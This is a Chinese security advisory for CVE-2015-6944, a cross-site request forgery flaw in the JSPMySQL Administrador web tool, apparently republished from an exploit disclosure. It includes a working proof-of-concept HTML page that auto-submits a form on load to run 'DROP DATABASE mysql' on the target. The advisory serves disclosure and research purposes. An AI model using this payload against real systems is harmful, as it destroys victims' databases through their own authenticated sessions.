安全研究

安全漏洞
JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)

发布日期:2015-09-15
更新日期:2015-09-16

受影响系统:
JSPMySQL Administrador JSPMySQL Administrador 0.1
描述:
CVE(CAN) ID: CVE-2015-6944

JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。

JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。

<*来源:hyp3rlinx
  
  链接:http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

hyp3rlinx ()提供了如下测试方法:

<!DOCTYPE>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>

<body onLoad="doit()">

<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

<!-- CSRF DROP MYSQL DATABASE -->

<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
<input type="text" name="btncmd" value="Enviar" />
<input type="text" name="bd" value="mysql" />
</form>

建议:
厂商补丁:

JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://sites.google.com/site/mfpledon/producao-de-software

浏览次数:3985
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障